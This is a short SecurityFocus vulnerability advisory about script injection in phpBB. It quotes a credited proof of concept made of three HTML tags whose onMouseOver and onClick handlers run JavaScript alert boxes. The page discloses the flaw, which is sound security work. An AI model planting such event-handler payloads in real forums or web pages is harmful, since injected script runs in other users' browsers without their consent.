Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

phpBB Script Injection Vulnerability

The following proof of concept code was supplied by Pete Foster <pete@sec-tec.demon.co.uk>:

<b onMouseOver="alert(document.location);">This piece of text could be
dangerous if you were to move your mouse over it!</b>

<i onClick="alert(document.location);">This piece of text could be dangerous
if you were to click it!</i>

<u onClick="alert('Hello');">This piece of text could be dangerous if you
were to click it!</u>







 

Privacy Statement
Copyright 2008, SecurityFocus